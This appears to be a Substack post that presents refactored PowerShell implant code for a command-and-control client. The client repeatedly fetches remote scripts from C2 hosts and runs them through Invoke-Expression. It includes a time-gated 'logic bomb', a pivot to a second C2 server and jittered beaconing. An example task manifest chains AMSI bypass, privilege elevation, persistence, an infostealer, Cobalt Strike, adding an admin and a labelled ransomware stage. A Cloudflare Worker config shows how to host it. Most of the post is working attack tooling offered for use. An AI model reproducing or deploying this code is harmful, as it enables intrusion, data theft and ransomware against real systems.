Chang's Substack

Chang's Substack

Playback speed
×
Share post
Share post at current time
0:00
/
Transcript

State Machine Upgrades

Support for State-Machine Pivots (transfer of one state machine to another), i.e. "bank robberies"
Chang Tan's avatar
Chang Tan
May 01, 2026

Refactored state machine code

# 1. Configuration
$manifestUri  = "https://c2-original/status.txt"
$TaskTracker  = [hashtable]::Synchronized(@{}) 
$RunspacePool = [runspacefactory]::CreateRunspacePool(1, 15)
$RunspacePool.Open()

$JobBlock = {
    param($Uri, $Name, $Tracker)
    try {
        if ($Uri -like "INTERNAL_SLEEP*") {
            Start-Sleep -Seconds ([int]($Uri -split '_')[-1])
        } else {
            Invoke-RestMethod -Uri $Uri -UseBasicParsing | Invoke-Expression
        }
        $Tracker[$Name] = "Completed"
    } catch { $Tracker[$Name] = "Failed" }
}

while ($true) {
    try {
        $raw = (Invoke-RestMethod -Uri $manifestUri -UseBasicParsing).Trim()
        $rows = $raw -split '\r?\n' | Where-Object { $_ -match ',' -and $_ -notlike '#*' }

        foreach ($row in $rows) {
            $cols = $row -split ',' | ForEach-Object { $_.Trim() }
            
            # --- HYBRID PARSER ---
            if ($cols.Count -lt 8) { continue } # Minimum 8 required
            
            $name       = $cols[0]
            $isEnabled  = $cols[1] -match "TRUE|1"
            $uri        = $cols[2]
            $isParallel = $cols[3] -match "TRUE|1"
            $hasDep     = $cols[5] -eq "DEPENDS"
            $depName    = $cols[7]
            
            # Auto-fill defaults for the new advanced columns if they are missing
            $targetDate = if ($cols.Count -ge 9) { $cols[8] } else { "NULL" }
            $taskType   = if ($cols.Count -ge 10) { $cols[9] } else { "TASK" }

            # 2. Guard: Already done?
            if (-not $isEnabled -or $TaskTracker.ContainsKey($name)) { continue }

            # --- THE GATES ---

            # A. Logic Bomb / Time Gate
            if ($targetDate -ne "NULL") {
                try {
                    $dt = [DateTime]::ParseExact($targetDate, "yyyy-MM-dd HH:mm", $null)
                    if ((Get-Date) -lt $dt) { continue }
                } catch { continue } # Bad date format? Skip it.
            }

            # B. Dependency Gate
            if ($hasDep -and $TaskTracker[$depName] -ne "Completed") { continue }

            # --- SPECIAL MODES ---

            if ($taskType -eq "DETONATE") { exit }

            if ($taskType -eq "SWITCH") {
                Write-Host "[!] PIVOTING C2: $uri" -ForegroundColor Yellow
                $manifestUri = $uri
                $TaskTracker.Clear()
                break # Re-fetch from NEW URL immediately
            }

            # --- EXECUTION ---
            $TaskTracker[$name] = "Running"
            $ps = [powershell]::Create().AddScript($JobBlock).AddArgument($uri).AddArgument($name).AddArgument($TaskTracker)
            $ps.RunspacePool = $RunspacePool
            $handle = $ps.BeginInvoke()

            if (-not $isParallel) {
                while ($TaskTracker[$name] -eq "Running") { Start-Sleep -Milliseconds 500 }
            }
        }
    } catch { Start-Sleep -Seconds 60 }

    # Jittered Heartbeat (Approx 4 hours)
    Start-Sleep -Seconds (14400 + (Get-Random -Min 0 -Max 600))
}

Example config

#NAME,ENABLED,URI,PARALLEL,LABEL,DEP_TYPE,DEP_ENABLED,DEP_NAME
AMSIBYPASS,TRUE,https://c2/payloadstage.ps1,FALSE,ON,NONE,FALSE,NULL
AUTOELEVATE,TRUE,https://c2-original/payloadstage.ps1,FALSE,ON,NONE,FALSE,NULL
REGPERSIST,TRUE,https://c2-original/payloadstage.ps1,FALSE,ON,NONE,FALSE,NULL
PATCHER,TRUE,https://c2-original/payloadstage.ps1,FALSE,ON,NONE,FALSE,NULL
REFLECTEDINFOSTEALER,TRUE,https://c2-original/payloadstage.ps1,TRUE,ON,NONE,FALSE,NULL
RUBEUSPIVOT,TRUE,https://c2-original/payloadstage.ps1,TRUE,ON,NONE,FALSE,NULL
PIVOT,TRUE,https://c2-original/payloadstage.ps1,TRUE,ON,NONE,FALSE,NULL
PSEXEC,TRUE,https://c2-original/payloadstage.ps1,TRUE,ON,NONE,FALSE,NULL
COBALTSTRIKE,TRUE,https://c2-original/payloadstage.ps1,TRUE,ON,NONE,FALSE,NULL
ZTINSTALL,TRUE,https://c2-original/payloadstage.ps1,TRUE,ON,NONE,FALSE,NULL
ADDADMIN,TRUE,https://c2-original/payloadstage.ps1,FALSE,ON,DEPENDS,TRUE,AUTOELEVATE
WAIT_STAGE,TRUE,INTERNAL_SLEEP_600,FALSE,ON,DEPENDS,TRUE,AUTOELEVATE
# Hidden ransomware bomb
STAGE2_UPGRADE,TRUE,[https://c2-second-stage-logic-bomb/status.txt,FALSE,ON,NONE,FALSE,NULL,2026-05-01](https://c2-second-stage-logic-bomb/status.txt,FALSE,ON,NONE,FALSE,NULL,2026-05-15) 00:00,SWITCH
FILELESSKERNELEXPLOIT,TRUE,https://c2-original/fileless-kernelexploitpayloadstage.ps1,FALSE,ON,DEPENDS,TRUE,AUTOELEVATE

New features

This line allows sleeping before executing the following commands after

WAIT_STAGE,TRUE,INTERNAL_SLEEP_600,FALSE,ON,DEPENDS,TRUE,AUTOELEVATE

This line allows a state-machine pivot, where at a specific time control transfer to another state machine

STAGE2_UPGRADE,TRUE,[https://c2-second-stage-logic-bomb/status.txt,FALSE,ON,NONE,FALSE,NULL,2026-05-01](>

Source of wrangler.toml file (make it so wrangler defines a first stage cloudflare worker and just wrangler deploy

name = "c2-original"
main = "src/index.js"
compatibility_date = "2026-04-30"

# This handles your PowerShell and Text imports
[[rules]]
type = "Text"
globs = ["**/*.ps1", "**/*.txt"]
fallthrough = true

Just do it again for the second stage logic bomb.

a

Ready for more?

© 2026 Chang Tan · PrivacyTermsCollection notice
Start your SubstackGet the app
Substack is the home for great culture